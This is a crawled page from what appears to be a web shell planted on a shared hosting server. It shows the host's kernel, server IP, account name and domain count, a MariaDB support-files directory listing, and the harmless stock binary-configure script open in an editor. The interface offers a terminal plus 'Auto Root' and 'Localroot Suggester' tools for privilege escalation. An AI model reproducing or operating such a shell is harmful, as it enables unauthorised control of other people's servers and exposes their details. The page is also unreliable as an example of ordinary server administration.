Linux sagir-us1.hostever.us 5.14.0-570.51.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 8 09:41:34 EDT 2025 x86_64
LiteSpeed
Server IP : 104.247.108.91 & Your IP : 216.73.216.26
Domains : 74 Domain
User : georgeto
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
local /
apps /
mariadb114 /
support-files /
Delete
Unzip
Name
Size
Permission
Date
Action
policy
[ DIR ]
drwxr-xr-x
2024-05-26 18:41
systemd
[ DIR ]
drwxrwxr-x
2025-02-25 04:02
binary-configure
1.13
KB
-rwxr-xr-x
2024-05-26 18:20
magic
1.44
KB
-rw-r--r--
2024-05-26 18:15
mariadb.logrotate
1.85
KB
-rwxr-xr-x
2024-05-26 18:20
mini-benchmark
9.37
KB
-rwxr-xr-x
2024-05-26 18:20
mysql.server
12.08
KB
-rwxr-xr-x
2024-05-26 18:20
mysqld_multi.server
1.53
KB
-rwxr-xr-x
2024-05-26 18:20
wsrep.cnf
3.39
KB
-rw-r--r--
2024-05-26 18:20
wsrep_notify
4.86
KB
-rwxr-xr-x
2024-05-26 18:20
Save
Rename
#!/bin/sh SCRIPT_NAME="`basename $0`" usage() { echo "Usage: ${SCRIPT_NAME} [--help|-h]" echo "" echo "This script creates the MySQL system tables and starts the server." } for arg do case "$arg" in --help|-h) usage exit 0 ;; *) echo "${SCRIPT_NAME}: unknown option $arg" usage exit 2 ;; esac done if test ! -x ./scripts/mysql_install_db then echo "I didn't find the script './scripts/mysql_install_db'." echo "Please execute this script in the mysql distribution directory!" exit 1; fi echo "NOTE: This is a MySQL binary distribution. It's ready to run, you don't" echo "need to configure it!" echo "" echo "To help you a bit, I am now going to create the needed MySQL databases" echo "and start the MySQL server for you. If you run into any trouble, please" echo "consult the MySQL manual, that you can find in the Docs directory." echo "" ./scripts/mysql_install_db --no-defaults if [ $? = 0 ] then echo "Starting the mariadbd server. You can test that it is up and running" echo "with the command:" echo "./bin/mysqladmin version" ./bin/mysqld_safe --no-defaults & fi